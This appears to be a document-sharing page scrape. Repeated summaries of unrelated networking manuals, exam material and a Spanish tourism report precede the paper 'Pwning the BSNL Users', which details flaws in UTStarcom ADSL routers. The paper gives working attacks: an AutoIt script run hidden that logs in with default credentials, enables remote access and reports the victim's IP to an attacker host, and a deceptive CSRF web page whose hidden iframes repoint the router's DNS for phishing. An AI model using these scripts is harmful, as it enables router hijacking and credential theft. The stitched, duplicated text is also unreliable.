The document summarizes vulnerabilities in UTSTARCOM routers distributed by BSNL in India that allow unauthorized access and control. The routers have hard-coded default credentials, lack proper access control, and have flaws that allow privileges to be escalated. This allows attackers to compromise routers remotely and carry out denial of service attacks, sniffing, or phishing. The document provides proofs-of-concept code to remotely access and reconfigure victim routers without authentication. It is recommended to change default credentials, implement server-side access control instead of client-side scripts, and provide better user instructions.
NetSim Technology Library - Software defined networksVishal Sharma
Software Defined Networking (SDN) module is featured from NetSim v11 onwards. This
module features an SDN controller which can be used to control packet forwarding of all Layer
3 devices in the Network.
This paper mainly focuses on using wireless technology effectively for security. The system is SMS-based and uses wireless technology to revolutionize the standards of living. It uses a GSM Modem to send an SMS to the home owner in case of an intrusion. The project is realized by interfacing an infrared trans-receiver with an ATMEGA16 microcontroller and a GSM Module. As the system uses GSM technology, it provides ubiquitous access to the system for security.
The document provides instructions for using MDMA, a Mobile Data Monitoring Application. It describes how to close other applications to avoid conflicts, explains the various data and signal monitoring features of MDMA, and provides technical details on connecting, signal strength, and command line options.
This document provides installation and usage instructions for the EMD (Energy Management Device) final prototype and user manual. It describes connecting the EMD to a home gateway via serial cable and to appliances via the home's power lines. It explains how to register users and install new appliances by selecting their profile. Maintenance instructions are included for updating the EMD's software bundles on the gateway. Testing of the EMD prototype was successful and next steps include implementing services in homes for pilot operations.
JP Dunning presented tools for spoofing Bluetooth profiles, collecting Bluetooth device profiles, and attacking Bluetooth devices. The talk introduced SpoofTooph for modifying Bluetooth profiles, a Bluetooth profiling project that collected over 1,500 device profiles, and offensive tools like vCardBlaster and Blueper for denial of service attacks by filling devices with contacts and files. The pwntooth suite automates attacks against multiple Bluetooth targets using a configuration file.
The document summarizes vulnerabilities in UTSTARCOM routers distributed by BSNL in India that allow unauthorized access and control. The routers have hard-coded default credentials that can be easily exploited to gain administrative access. Once compromised, the routers are open to denial of service attacks, traffic sniffing, and phishing. The document provides proof-of-concept code to remotely access a vulnerable router and change its settings without authentication. It also discusses potential mitigations like changing default passwords and implementing proper access control on the router instead of using client-side scripts.
El Departamento del Quindío, siendo uno de los principales
destinos turísticos de Colombia, tiene la necesidad de
conocer el impacto de la actividad turística sobre la economía
local y sus directos implicados; las preferencias de los turistas
que marcan las tendencias de una demanda creciente.
Para ello, la Cámara de Comercio de Armenia y del Quindío
mediante el Observatorio de Turismo, ha desarrollado un
proceso de investigación desde el año 2005, el cual se
construye a través de la aplicación de encuestas a visitantes
nacionales y extranjeros, siendo un importante instrumento
de información para el análisis de la dinámica económica de
la actividad turística en el departamento. Este ejercicio
permite además, identificar la evolución de la oferta y la
demanda en el sector; además, contribuye a la toma de
decisiones por parte de actores públicos y privados
involucrados directa o indirectamente en el turismo.
A continuación se presenta la versión 35 del estudio que se
llevó a cabo durante la temporada turística de Semana Santa,
comprendida entre 18 y el 27 de marzo de 2016, con el fin
brindar los resultados del perfil de los visitantes, sus
preferencias y percepción del destino. Refleja también el
comportamiento que tuvieron los Prestadores de Servicios
Turísticos en una de las temporadas más fuertes del año
Agradecemos la colaboración del Aeropuerto Internacional El
Edén, los centros comerciales: Calima Armenia, Unicentro
Armenia y Portal del Quindío; el Jardín Botánico del Quindío,
Parques temáticos y la Terminal de Transportes de Armenia,
por permitir la aplicación de las encuestas en sus
instalaciones. Igualmente, a los prestadores de servicios
turísticos por la información suministrada.
Rodrigo Estrada Reveiz
Presidente ejecutivo
NetSim Technology Library - Software defined networksVishal Sharma
Software Defined Networking (SDN) module is featured from NetSim v11 onwards. This
module features an SDN controller which can be used to control packet forwarding of all Layer
3 devices in the Network.
This paper mainly focuses on using wireless technology effectively for security. The system is SMS-based and uses wireless technology to revolutionize the standards of living. It uses a GSM Modem to send an SMS to the home owner in case of an intrusion. The project is realized by interfacing an infrared trans-receiver with an ATMEGA16 microcontroller and a GSM Module. As the system uses GSM technology, it provides ubiquitous access to the system for security.
The document provides instructions for using MDMA, a Mobile Data Monitoring Application. It describes how to close other applications to avoid conflicts, explains the various data and signal monitoring features of MDMA, and provides technical details on connecting, signal strength, and command line options.
This document provides installation and usage instructions for the EMD (Energy Management Device) final prototype and user manual. It describes connecting the EMD to a home gateway via serial cable and to appliances via the home's power lines. It explains how to register users and install new appliances by selecting their profile. Maintenance instructions are included for updating the EMD's software bundles on the gateway. Testing of the EMD prototype was successful and next steps include implementing services in homes for pilot operations.
JP Dunning presented tools for spoofing Bluetooth profiles, collecting Bluetooth device profiles, and attacking Bluetooth devices. The talk introduced SpoofTooph for modifying Bluetooth profiles, a Bluetooth profiling project that collected over 1,500 device profiles, and offensive tools like vCardBlaster and Blueper for denial of service attacks by filling devices with contacts and files. The pwntooth suite automates attacks against multiple Bluetooth targets using a configuration file.
The document summarizes vulnerabilities in UTSTARCOM routers distributed by BSNL in India that allow unauthorized access and control. The routers have hard-coded default credentials that can be easily exploited to gain administrative access. Once compromised, the routers are open to denial of service attacks, traffic sniffing, and phishing. The document provides proof-of-concept code to remotely access a vulnerable router and change its settings without authentication. It also discusses potential mitigations like changing default passwords and implementing proper access control on the router instead of using client-side scripts.
El Departamento del Quindío, siendo uno de los principales
destinos turísticos de Colombia, tiene la necesidad de
conocer el impacto de la actividad turística sobre la economía
local y sus directos implicados; las preferencias de los turistas
que marcan las tendencias de una demanda creciente.
Para ello, la Cámara de Comercio de Armenia y del Quindío
mediante el Observatorio de Turismo, ha desarrollado un
proceso de investigación desde el año 2005, el cual se
construye a través de la aplicación de encuestas a visitantes
nacionales y extranjeros, siendo un importante instrumento
de información para el análisis de la dinámica económica de
la actividad turística en el departamento. Este ejercicio
permite además, identificar la evolución de la oferta y la
demanda en el sector; además, contribuye a la toma de
decisiones por parte de actores públicos y privados
involucrados directa o indirectamente en el turismo.
A continuación se presenta la versión 35 del estudio que se
llevó a cabo durante la temporada turística de Semana Santa,
comprendida entre 18 y el 27 de marzo de 2016, con el fin
brindar los resultados del perfil de los visitantes, sus
preferencias y percepción del destino. Refleja también el
comportamiento que tuvieron los Prestadores de Servicios
Turísticos en una de las temporadas más fuertes del año
Agradecemos la colaboración del Aeropuerto Internacional El
Edén, los centros comerciales: Calima Armenia, Unicentro
Armenia y Portal del Quindío; el Jardín Botánico del Quindío,
Parques temáticos y la Terminal de Transportes de Armenia,
por permitir la aplicación de las encuestas en sus
instalaciones. Igualmente, a los prestadores de servicios
turísticos por la información suministrada.
Rodrigo Estrada Reveiz
Presidente ejecutivo
This document provides a tutorial on configuring MikroTik routers for various purposes such as proxy servers, bandwidth management, NAT, bridging, and network monitoring. It discusses how to set up basic router configurations like naming interfaces and assigning IP addresses. It also explains how to configure MikroTik for functions like transparent proxy caching, bandwidth limiting using queues, network address translation (NAT), bridging multiple network segments, and network monitoring with MRTG graphs. The tutorial is intended to simplify MikroTik configurations for beginners.
Design and Implementation of monitoring LAN user wirelessly by Android mobile...theijes
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
Design and Implementation of monitoring LAN user wirelessly by Android mobile...theijes
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
The papers for publication in The International Journal of Engineering& Science are selected through rigorous peer reviews to ensure originality, timeliness, relevance, and readability.
This document provides a tutorial on configuring MikroTik routers for various purposes such as proxy servers, bandwidth management, bridging, and network address translation (NAT). It discusses how to access MikroTik devices, set up basic configurations like naming and IP addresses. It then explains how to configure MikroTik for transparent proxy servers, separate proxy servers, bandwidth limiting using queues, and bridging interfaces. The document also discusses enabling graphing tools on MikroTik to monitor traffic and system resources.
003 obf600105 gpon ma5608 t basic operation and maintenance v8r15 issue1.02 (...Cavanghetboi Cavangboihet
This document provides a summary of the basic operations and maintenance of the GPON system from Huawei Technologies. It describes how to set up the maintenance environment, use command line features, perform system basic operations and maintenance, configure network management, and set up management security. Key topics covered include user account management, system configuration, hardware operation, and system maintenance.
This document contains questions about router security configuration and concepts. It covers topics like AAA configuration, SSH, SNMP, SDM wizards, and Cisco IOS resilience features. The questions ask about commands, default settings, and characteristics related to securing and hardening a Cisco router.
The document contains a practice exam for CCNA 1 with multiple choice questions about networking concepts. It covers topics like the OSI model, TCP/IP, IPv4 and IPv6 addressing, routing, switching, and troubleshooting. An example question asks which layer of the OSI model would format data as shown in an exhibit. The correct answer is the data link layer.
This document proposes a system to remotely administer network servers using short message service (SMS). The key aspects are:
1. An application installed on a workstation monitors network devices using SNMP and sends status updates and failure alerts to administrators via SMS.
2. Administrators can send SMS commands to the application, which are converted to SNMP commands to manage devices remotely.
3. The system was tested on a university network and reduced downtime by allowing administrators to address issues from anywhere via SMS.
This document discusses setting up an Internet access server using MikroTik RouterOS and the ISP billing system NetUP UTM5. It provides instructions for configuring MikroTik RouterOS on the access server, including setting IP addresses, default gateway, DNS, and SNAT. It also describes configuring the utm5_rfw daemon to allow the billing system to control Internet access by adding and removing firewall rules via scripts. The billing system is then configured to define firewall rules and tariffs to automate enabling and limiting bandwidth for user accounts.
This document is a user guide for WANem 1.1, a network emulator tool. It describes WANem's usage scenarios such as unit testing and performance testing. It also outlines how to operate WANem through its graphical user interface or console commands. Key network characteristics like bandwidth, delay, loss, and disconnections that can be simulated are also defined.
This document describes a remote desktop management system that allows an administrator to monitor and control client computers from a server. Key features of the system include asset management, software deployment, patch management, remote desktop sharing, and generating reports. The system uses Remote Method Invocation (RMI) for remote communication between the server and clients. The server can send messages to clients, log clients off remotely, and restart clients. Clients send live screen captures to the server at set intervals. The system is intended for use in corporate networks to remotely monitor employee computers.
The document provides instructions for setting up and using a wireless IP camera. It outlines the steps for hardware setup including plugging in the network and power cables. It describes installing the software by opening the CD, finding the software, and clicking through the installation wizard. The document then explains how to access the camera through the IP Camera Tool software or web browser by entering login credentials. It provides information on software features like panning, tilting, zooming and settings configuration. Finally, it discusses remotely accessing the camera using the router, static IP, or dynamic DNS and addresses some frequently asked questions.
This document provides instructions for installing and initially configuring Forefront Threat Management Gateway 2010. The objectives are to install TMG on a Windows Server 2008 R2 server and perform an initial configuration using the Getting Started wizards. The lab environment includes virtual machines for a domain controller, Exchange server, and TMG server. The tasks covered are installing TMG and Forefront Protection for Exchange Server, and using the Network Settings, System Configuration, and Deployment Wizards to configure TMG.
Smart Lan System for Controlling and Monitoring Network Using at Commands in ...IRJET Journal
This document describes a Smart LAN system that allows an administrator to remotely control and monitor computers on a local network using a mobile phone. The system has two main modules: 1) A manager module runs on the server and allows setting permissions, viewing reports, and controlling client states. 2) An agent module runs on each client and monitors devices and processes, checking permissions and sending reports to the manager. The system uses GSM technology to allow administrators to send commands from their phone to control clients through starting/stopping processes, sending messages, and more. This allows remote administration and prevention of unauthorized access on the local network.
Smart Lan System for Controlling and Monitoring Network Using at Commands in ...IRJET Journal
This document describes a Smart LAN System that allows an administrator to remotely control and monitor a local area network using a mobile phone. The system has two main modules: 1) a Manager module that runs on a server and allows setting permissions, viewing reports, and controlling client states, and 2) an Agent module that runs on each client PC and monitors devices and processes, enforcing permissions set by the Manager. The system uses GSM technology and AT commands to allow the administrator to remotely send commands from their mobile phone to control clients, like starting/killing processes, sending messages, or accessing files. This provides a low-cost way to securely manage a LAN from a remote location.
Switches direct and control much of the data flowing across computer networks.
Conventional network security often focuses more on routers and blocking traffic from the outside.
Switches are internal to the organization and designed to allow ease of connectivity, therefore only
limited or no security measures are applied.
NetSim MANETs component can be interfaced with
Component 6 (IOT) module to run 802.15.4 in MAC/PHY
Component 9 (VANETs) module to run IEEE 1609 WAVE in MAC/PHY
Military Radio Add on to run TDMA/DTDMA in MAC/PHY
The document describes an integrated home automation system that allows users to control devices locally or remotely using GSM, web, or speech-based commands. The system has two main modules: 1) a server module with a database that stores control requests and commands devices, and 2) hardware interface modules that provide connections to home appliances. Users can send control requests via SMS, a web interface, or voice commands, which are stored in the server database and carried out by activating the relevant hardware interfaces. The system aims to provide a flexible platform for remote home device control using different input methods.
This document provides a tutorial on configuring MikroTik routers for various purposes such as proxy servers, bandwidth management, NAT, bridging, and network monitoring. It discusses how to set up basic router configurations like naming interfaces and assigning IP addresses. It also explains how to configure MikroTik for functions like transparent proxy caching, bandwidth limiting using queues, network address translation (NAT), bridging multiple network segments, and network monitoring with MRTG graphs. The tutorial is intended to simplify MikroTik configurations for beginners.
Design and Implementation of monitoring LAN user wirelessly by Android mobile...theijes
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
Design and Implementation of monitoring LAN user wirelessly by Android mobile...theijes
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
The papers for publication in The International Journal of Engineering& Science are selected through rigorous peer reviews to ensure originality, timeliness, relevance, and readability.
This document provides a tutorial on configuring MikroTik routers for various purposes such as proxy servers, bandwidth management, bridging, and network address translation (NAT). It discusses how to access MikroTik devices, set up basic configurations like naming and IP addresses. It then explains how to configure MikroTik for transparent proxy servers, separate proxy servers, bandwidth limiting using queues, and bridging interfaces. The document also discusses enabling graphing tools on MikroTik to monitor traffic and system resources.
003 obf600105 gpon ma5608 t basic operation and maintenance v8r15 issue1.02 (...Cavanghetboi Cavangboihet
This document provides a summary of the basic operations and maintenance of the GPON system from Huawei Technologies. It describes how to set up the maintenance environment, use command line features, perform system basic operations and maintenance, configure network management, and set up management security. Key topics covered include user account management, system configuration, hardware operation, and system maintenance.
This document contains questions about router security configuration and concepts. It covers topics like AAA configuration, SSH, SNMP, SDM wizards, and Cisco IOS resilience features. The questions ask about commands, default settings, and characteristics related to securing and hardening a Cisco router.
The document contains a practice exam for CCNA 1 with multiple choice questions about networking concepts. It covers topics like the OSI model, TCP/IP, IPv4 and IPv6 addressing, routing, switching, and troubleshooting. An example question asks which layer of the OSI model would format data as shown in an exhibit. The correct answer is the data link layer.
This document proposes a system to remotely administer network servers using short message service (SMS). The key aspects are:
1. An application installed on a workstation monitors network devices using SNMP and sends status updates and failure alerts to administrators via SMS.
2. Administrators can send SMS commands to the application, which are converted to SNMP commands to manage devices remotely.
3. The system was tested on a university network and reduced downtime by allowing administrators to address issues from anywhere via SMS.
This document discusses setting up an Internet access server using MikroTik RouterOS and the ISP billing system NetUP UTM5. It provides instructions for configuring MikroTik RouterOS on the access server, including setting IP addresses, default gateway, DNS, and SNAT. It also describes configuring the utm5_rfw daemon to allow the billing system to control Internet access by adding and removing firewall rules via scripts. The billing system is then configured to define firewall rules and tariffs to automate enabling and limiting bandwidth for user accounts.
This document is a user guide for WANem 1.1, a network emulator tool. It describes WANem's usage scenarios such as unit testing and performance testing. It also outlines how to operate WANem through its graphical user interface or console commands. Key network characteristics like bandwidth, delay, loss, and disconnections that can be simulated are also defined.
This document describes a remote desktop management system that allows an administrator to monitor and control client computers from a server. Key features of the system include asset management, software deployment, patch management, remote desktop sharing, and generating reports. The system uses Remote Method Invocation (RMI) for remote communication between the server and clients. The server can send messages to clients, log clients off remotely, and restart clients. Clients send live screen captures to the server at set intervals. The system is intended for use in corporate networks to remotely monitor employee computers.
The document provides instructions for setting up and using a wireless IP camera. It outlines the steps for hardware setup including plugging in the network and power cables. It describes installing the software by opening the CD, finding the software, and clicking through the installation wizard. The document then explains how to access the camera through the IP Camera Tool software or web browser by entering login credentials. It provides information on software features like panning, tilting, zooming and settings configuration. Finally, it discusses remotely accessing the camera using the router, static IP, or dynamic DNS and addresses some frequently asked questions.
This document provides instructions for installing and initially configuring Forefront Threat Management Gateway 2010. The objectives are to install TMG on a Windows Server 2008 R2 server and perform an initial configuration using the Getting Started wizards. The lab environment includes virtual machines for a domain controller, Exchange server, and TMG server. The tasks covered are installing TMG and Forefront Protection for Exchange Server, and using the Network Settings, System Configuration, and Deployment Wizards to configure TMG.
Smart Lan System for Controlling and Monitoring Network Using at Commands in ...IRJET Journal
This document describes a Smart LAN system that allows an administrator to remotely control and monitor computers on a local network using a mobile phone. The system has two main modules: 1) A manager module runs on the server and allows setting permissions, viewing reports, and controlling client states. 2) An agent module runs on each client and monitors devices and processes, checking permissions and sending reports to the manager. The system uses GSM technology to allow administrators to send commands from their phone to control clients through starting/stopping processes, sending messages, and more. This allows remote administration and prevention of unauthorized access on the local network.
Smart Lan System for Controlling and Monitoring Network Using at Commands in ...IRJET Journal
This document describes a Smart LAN System that allows an administrator to remotely control and monitor a local area network using a mobile phone. The system has two main modules: 1) a Manager module that runs on a server and allows setting permissions, viewing reports, and controlling client states, and 2) an Agent module that runs on each client PC and monitors devices and processes, enforcing permissions set by the Manager. The system uses GSM technology and AT commands to allow the administrator to remotely send commands from their mobile phone to control clients, like starting/killing processes, sending messages, or accessing files. This provides a low-cost way to securely manage a LAN from a remote location.
Switches direct and control much of the data flowing across computer networks.
Conventional network security often focuses more on routers and blocking traffic from the outside.
Switches are internal to the organization and designed to allow ease of connectivity, therefore only
limited or no security measures are applied.
NetSim MANETs component can be interfaced with
Component 6 (IOT) module to run 802.15.4 in MAC/PHY
Component 9 (VANETs) module to run IEEE 1609 WAVE in MAC/PHY
Military Radio Add on to run TDMA/DTDMA in MAC/PHY
The document describes an integrated home automation system that allows users to control devices locally or remotely using GSM, web, or speech-based commands. The system has two main modules: 1) a server module with a database that stores control requests and commands devices, and 2) hardware interface modules that provide connections to home appliances. Users can send control requests via SMS, a web interface, or voice commands, which are stored in the server database and carried out by activating the relevant hardware interfaces. The system aims to provide a flexible platform for remote home device control using different input methods.
1. Pwning the BSNL Users
SathyaPrakash.K aka Boris Varun.V
Sathyaprakash222@gmail.com varun89.malar@gmail.com
www.boris-info.co.cc www.boris-info.co.cc
PanimalarEngineeringCollege,Chennai PanimalarEngineeringCollege,Chennai
India India
Abstract:
The most common home
ADSL Modem cum Router which
India's No 1 ISP uses is this UT-
STARCOM
product(UT300R2U).The router’s
embedded server has several flaws
which makes it vulnerable,
The flaws upon exploitation gives
admin access to the router over
WAN ,Wireless router products of
this company are also affected by
this vulnerability.Possible attacks on
compromised routers are Denial of
Service attacks,Remote
Sniffing,Phishing etc..
Affected Firmware versions UT300R2U
series Software version
3.08.BSNL_02.01.02_tr64
3.12L.BSNL_01.A2pB023K.d20K_rc2 and
more. We propose some
countermeasures techniques to defeat
these kinds of attacks.
1.UT-STARCOM:
The US based company whose
modem cum router which is
distributed by BSNL[1] runs a server
on its hardware which is prone to
several exploits.
The main failure of the server lies in
its Access control mechanisms,which
is improperly sanitized.
2.Protection mechanisms:
The standard so called protection
mechanisms buit into the router are as
follows
1.Remote HTTP
acess is blocked by default,which was
once a famous vulnerability [2]
2.Access control
determines which privilege should be
given to which user groups,thereby
preventing USER from accessing
ADMIN functions.
3.Vulnerability Description:
3.1 Poor user Validation:
The modem has 3 inbuilt users
1.admin
2.user
3.support (non-
existant)
these accounts have their respective
usernames as default password.
Usually most of the home users
don't change the default ADMIN
password.But some smart users do
so,but they aren't really smart enough
to find what are the user accounts
present in their ADSL
Modem+Router..
When a user logs in to the modem as
2. ADMIN he has full access to the
router,whereas when logged in as a
limited USER ,the user could not
modify any settings on the
router.This is the protection
mechanism implemented by the
manufacuter.
3.1.1User Privileges:
The Privilege of access is not at
all being controlled,simple
javacript(menuBCM.js) handles the
privilage of access mechanism.
menuBCM.js does nothing but just
hides specific menus to USER &
shows everything to the ADMIN.This
is insecure,since when the path of a
menu is known anyone(USER) could
request the server to get the page and
indiscriminate of privileges the server
replies them with the result.
3.1.2 Passwords:
The poor implementation of the
server is shown from the
password.html page.This page is
called by the ADMIN user while
changing the passwords for
users.This page has the passwords of
the users in clear text for the use of
javascript to validate change of
passwords
3.2 Telnet Service:
Since i had mentioned
earlier that the privilege of user
access is not at all being controlled &
javascripts does it by hiding the
menus ,It is obvious that a javascript
has nothing to do in a telnet session,
hence ADMIN access is given for a
USER in a telnet session.
4. Proof of Concept:
Lets have a look at the source code
of the javascript which handles the
privilege of access mechanism
menuBCM.js:
function menuAdmin(options) { //
All the options are displayed for
ADMIN
var std =
options[MENU_OPTION_STANDAR
D];
var proto =
options[MENU_OPTION_PROTOC
OL];
var firewall =
options[MENU_OPTION_FIREWAL
L];
var nat =
options[MENU_OPTION_NAT];
var ipExt =
options[MENU_OPTION_IP_EXTE
NSION];
var wireless =
options[MENU_OPTION_WIRELES
S];
var voice =
options[MENU_OPTION_VOICE];
var snmp =
options[MENU_OPTION_SNMP];
var ddnsd =
options[MENU_OPTION_DDNSD];
var sntp =
options[MENU_OPTION_SNTP];
.
.
if ( user == 'admin' ) //this piece of
code calls the respective menu to be
3. displayed
menuAdmin(options);
else if ( user == 'support' )
menuSupport(options);
else if ( user == 'user' )
menuUser();
}
-------------code truncated
Each menu is assigned to a variable
& respective set of menu’s are called
depending on the user logged in.
Accessing the router as
ADMIN:
Accessing the router as
USER:
Accessing the password page
in USER mode of Privilege:
Navigating
/password.html
Source code of
password.html
<script language="javascript">
<!-- hide
pwdAdmin = 'lame'; //Passwords
for all users are passed in plaintext
for comparing
pwdSupport = 'support';
pwdUser = 'user';
function btnApply() {
var loc = 'password.cgi?';
with ( document.forms[0] ) {
var idx = userName.selectedIndex;
switch ( idx ) {
case 0:
alert("No username is
selected.");
return;
case 1:
4. if ( pwdOld.value ==
pwdAdmin )
break;
else {
alert("Old admin password
is wrong.");
return;
}
case 2:
if ( pwdOld.value ==
pwdSupport )
break;
else {
alert("Old support
password is wrong.");
-------------------------- truncated
Passwords in plain text are used to
compare with the user entered ones
while changing old passwords
Telnet Access:
while connecting through
telnet USER is given ADMIN access
is given
5.Compromising the Router:
From the above analysis we had
determined that the entry point into
the router is through the default
passwords & as none is concerned
about the USER account
5.1. Malware
The default ipaddress for the
UTSTARCOM ADSL Router is
192.168.1.1 however if the default
address is changed we could
enumerate it with few lines of extra
codes to the malware.
The task of the malware is to telnet
into the router of the victim using
user:user combination and to enable
the WAN-http access on the router &
log his external ipaddress to the
attacker.Now the attacker could just
navigate to the ipaddress from his
logs and he will be greeted by the
victim’s router (considering port 80
on WAN is not forwaded).Now using
the user:user combination the attacker
can login into the victim’s router and
by navigating to /passwords.html
page admin password could be
obtained.
Here is my custom script in autoIT[3]
doing the job
Bjacker V 1.0
#include <IE.au3>
$oIE = _IECreate
("www.boris222.0fees.net/ip.php")
_IENavigate ($oIE,
"www.boris222.0fees.net/ip.php");
Run ("telnet.exe 192.168.1.1 ")
Sleep(1000)
5. Send("user")
Send("{ENTER}")
Sleep(1000)
Send("user")
Send("{ENTER}")
Send("remoteaccess enable --service
http")
Send("{ENTER}")
Sleep(3000)
Send("logout")
Send("{ENTER}")
ProcessClose("telnet.exe")
http://attacker.net/ip.php
has a script which logs the ipaddress
of the victim in the mysql database
server of the attacker.
While compiling this script into an
exe by specifying the necessary
parameters the executable could be
run in hidden mode.
remoteaccess enable --service http
This command enables http access to
the device through the WAN.
5.2. Web way(CSRF)
This method uses the Cross site
request forgery attacks[4] to loginto
the victim’s router and utilizing
iframes to do necessary configuration
changes on the router in a hidden
manner.
With latest browsers having BEAP
protection enabled some strong social
engineering skills are needed to carry
out this attack successfully.
Bjacking V 1.1:
This is a advanced and most
dangerous method of attack, Yes it is
true when a BSNL
user with a UTSTARCOM
Router/Modem visits a webpage he
gets his router
compromised.
This feature combines CSRF to log
into the router and change the remote
access
configuration, and it calls the
iplogger to log the victim ip ; The
entire process happening
inside is hidden by a IFRAME,
however modernday browsers with
BEAP would ask the
user for conformation to loginto
192.168.1.1 , which could be
bypassed by social
engineering
index.html
<html>
<head>
<title>SpeedItUp</title>
</head>
<body>
<br><h1>This page configures your
system to use high speed internet,
please wait for
few seconds for the script to
configure</h1></br>
Please click the button to continue.
<iframe src ="config.html" width=70
marginwidth="25%" height=20
scrolling="no" frameborder="0"
class="iframe"></iframe>
</body>
</html>
7. This is the attack of our special
interest as it is one of the stealthiest
attack when combined with routing
attacks.
The attacker could specify a fake
DNS server for the victim router and
could carry out phishing attacks.
http://192.168.1.1/dnscfg.cgi?dnsPri
mary=4.1.1.1&dnsSecondary=2.1.2.3
&dnsDynamic=0&dnsRefresh=1
This changes the primary &
secondary DNS servers of the
victim’s router
Victim’s Network Layout:
This is a normal (usual ) network
setup of a home user.
Normal Operation:
The router has a default DNS server
assigned by the ISP.Some times it
may be provided by a DHCP server.
index.html
<html>
<head>
<title>SpeedItUp</title>
</head>
<body>
<br><h1>This page configures your
system to use high speed internet,
please wait for
few seconds for the script to
configure</h1></br>
Please click the button to continue.
<iframe src ="config.html" width=70
marginwidth="25%" height=20
scrolling="no" frameborder="0"
class="iframe"></iframe>
</body>
</html>
config.html
8. <html>
<body
onload="window.scrollTo(1440,
980);">
<iframe
src="http://user:user@192.168.1.1/
dnscfg.cgi?dnsPrimary=113.21.12.31
&dnsSecondary=113.21.12.31&dnsD
ynamic=0&dnsRefresh=1”
width=3000 height=1000
frameborder=0></iframe>
</body>
</html>
The above script changes the primary
& secondary dns servers as specified
by the attacker.
Attack Scenario:
The DNS server specified by the
attacker phishes all the famaous sites
(E-MAIL,NETBANKING,SOCIAL
NETWORKING etc)
Some advanced users might wonder
about the ssl (https) for them there
comes the routing attack.
By specifying a static route through
the attacker’s network MITM attacks
can be carried out.Using SSL Strip[5]
does the job for advanced users.
Statistics[6]:
And this is the statisctics for number
of BSNL users,Most of the
NorthIndian
BSNL clients are provided with
Huawei modem cum routers and they
are not affected by
this vulnerability( I haven't reviewed
it) and remaining are given with this
UTStarcom
product,so nearly 20% of Indian
Internet users are vulnerable to this
exploit.
9. Solution:
Temp: Change the default password for ADMIN and USER group of
users.As the default User:User combination makes the attacker to intrude into the
router
Permenent:
Get ridden of those nasty javascripts,implement the access control using serverside
scripts storing cookies,As access control using clientside scripting is completly
ridiculous,as the client could do anything.
Last but not the least “Don’t give Dumb Instructions[7] for the HOME
USER’S on configuring the device”